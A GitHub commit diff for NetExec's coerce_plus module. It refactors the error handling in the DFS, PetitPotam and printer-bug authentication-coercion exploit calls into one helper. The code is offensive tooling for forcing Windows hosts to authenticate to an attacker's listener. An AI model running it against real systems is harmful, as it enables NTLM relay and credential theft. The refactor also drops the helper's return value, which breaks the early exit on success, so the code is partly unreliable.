Skip to content

Commit d61eec0

Browse files
NeffIsBackNeffIsBack
authored
Merge pull request Pennyw0rth#442 from Pennyw0rth/neff-improve-coerce_plus
Small fixes for coerce_plus
2 parents b59d823 + 83a16b6 commit d61eec0

1 file changed

Lines changed: 20 additions & 59 deletions

File tree

nxc/modules/coerce_plus.py

Lines changed: 20 additions & 59 deletions
Original file line numberDiff line numberDiff line change
@@ -389,15 +389,7 @@ def exploit(self, dce, listener, always_continue, pipe):
389389

390390
dce.request(request)
391391
except Exception as e:
392-
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
393-
self.context.log.debug("NetrDfsAddStdRootForced Success")
394-
self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsAddStdRootForced")
395-
if not always_continue:
396-
return True
397-
elif str(e).find("ERROR_NOT_SUPPORTED") >= 0:
398-
self.context.log.debug("Not Vulnerable")
399-
else:
400-
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
392+
self.handle_exception(request.__class__.__name__, always_continue, pipe, e)
401393

402394
self.context.log.debug("Sending NetrDfsAddRootTarget!")
403395
try:
@@ -421,15 +413,7 @@ def exploit(self, dce, listener, always_continue, pipe):
421413
self.context.log.debug("NetrDfsAddRootTarget Success")
422414
return True
423415
except Exception as e:
424-
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
425-
self.context.log.debug("NetrDfsAddRootTarget Success")
426-
self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsAddRootTarget")
427-
if not always_continue:
428-
return True
429-
elif str(e).find("ERROR_NOT_SUPPORTED") >= 0:
430-
self.context.log.debug("Not Vulnerable")
431-
else:
432-
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
416+
self.handle_exception(request.__class__.__name__, always_continue, pipe, e)
433417

434418
# Private exploit
435419
self.context.log.debug("Sending NetrDfsRemoveRootTarget!")
@@ -448,13 +432,7 @@ def exploit(self, dce, listener, always_continue, pipe):
448432
self.context.log.debug("NetrDfsRemoveRootTarget Success")
449433
return True
450434
except Exception as e:
451-
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
452-
self.context.log.debug("NetrDfsRemoveRootTarget Success")
453-
self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsRemoveRootTarget")
454-
if not always_continue:
455-
return True
456-
else:
457-
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
435+
self.handle_exception(request.__class__.__name__, always_continue, pipe, e)
458436

459437
self.context.log.debug("Sending NetrDfsManagerInitialize!")
460438
try:
@@ -469,15 +447,7 @@ def exploit(self, dce, listener, always_continue, pipe):
469447

470448
dce.request(request)
471449
except Exception as e:
472-
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
473-
self.context.log.debug("NetrDfsAdd Success")
474-
self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsAdd")
475-
if not always_continue:
476-
return True
477-
elif str(e).find("ERROR_NOT_SUPPORTED") >= 0:
478-
self.context.log.debug("Not Vulnerable")
479-
else:
480-
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
450+
self.handle_exception(request.__class__.__name__, always_continue, pipe, e)
481451

482452
self.context.log.debug("Sending NetrDfsManagerInitialize!")
483453
try:
@@ -492,15 +462,7 @@ def exploit(self, dce, listener, always_continue, pipe):
492462

493463
dce.request(request)
494464
except Exception as e:
495-
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
496-
self.context.log.debug("NetrDfsAdd Success")
497-
self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsAdd")
498-
if not always_continue:
499-
return True
500-
elif str(e).find("ERROR_NOT_SUPPORTED") >= 0:
501-
self.context.log.debug("Not Vulnerable")
502-
else:
503-
self.context.log.highlight(f"Something went wrong, check error status => {e!s}")
465+
self.handle_exception(request.__class__.__name__, always_continue, pipe, e)
504466

505467
self.context.log.debug("Sending NetrDfsAddStdRoot!")
506468
try:
@@ -511,13 +473,7 @@ def exploit(self, dce, listener, always_continue, pipe):
511473
request["ApiFlags"] = 0
512474
dce.request(request)
513475
except Exception as e:
514-
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
515-
self.context.log.debug("NetrDfsAddStdRoot Success")
516-
self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsAddStdRoot")
517-
if not always_continue:
518-
return True
519-
else:
520-
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
476+
self.handle_exception(request.__class__.__name__, always_continue, pipe, e)
521477

522478
self.context.log.debug("Sending NetrDfsRemoveStdRoot!")
523479
try:
@@ -527,13 +483,18 @@ def exploit(self, dce, listener, always_continue, pipe):
527483
request["ApiFlags"] = 0
528484
dce.request(request)
529485
except Exception as e:
530-
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
531-
self.context.log.debug("NetrDfsRemoveStdRoot Success")
532-
self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsRemoveStdRoot")
533-
if not always_continue:
534-
return True
535-
else:
536-
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
486+
self.handle_exception(request.__class__.__name__, always_continue, pipe, e)
487+
488+
def handle_exception(self, method_name, always_continue, pipe, e):
489+
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
490+
self.context.log.debug(f"{method_name} Success")
491+
self.context.log.highlight(f"Exploit Success, {pipe}\\{method_name}")
492+
if not always_continue:
493+
return True
494+
elif str(e).find("ERROR_NOT_SUPPORTED") >= 0:
495+
self.context.log.debug("Not Vulnerable")
496+
else:
497+
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
537498

538499

539500
class PetitPotamtTrigger:
@@ -868,7 +829,7 @@ def exploit(self, dce, listener, target, always_continue, pipe):
868829

869830
self.context.log.debug("Sending RpcRemoteFindFirstPrinterChangeNotification!")
870831
try:
871-
resp = rprn.hRpcOpenPrinter(dce, "\\\\%s\x00" % target)
832+
resp = rprn.hRpcOpenPrinter(dce, f"\\\\{target}\x00")
872833
except Exception as e:
873834
if str(e).find("Broken pipe") >= 0:
874835
# The connection timed-out. Let's try to bring it back next round
@@ -892,7 +853,7 @@ def exploit(self, dce, listener, target, always_continue, pipe):
892853
request["pBuffer"] = NULL
893854
dce.request(request)
894855
except Exception as e:
895-
if str(e).find("rpc_s_access_denied") >= 0:
856+
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("RPC_S_SERVER_UNAVAILABLE") >= 0:
896857
self.context.log.debug("RpcRemoteFindFirstPrinterChangeNotification Success")
897858
self.context.log.highlight(f"Exploit Success, {pipe}\\RpcRemoteFindFirstPrinterChangeNotification")
898859
if not always_continue:

0 commit comments

Comments
 (0)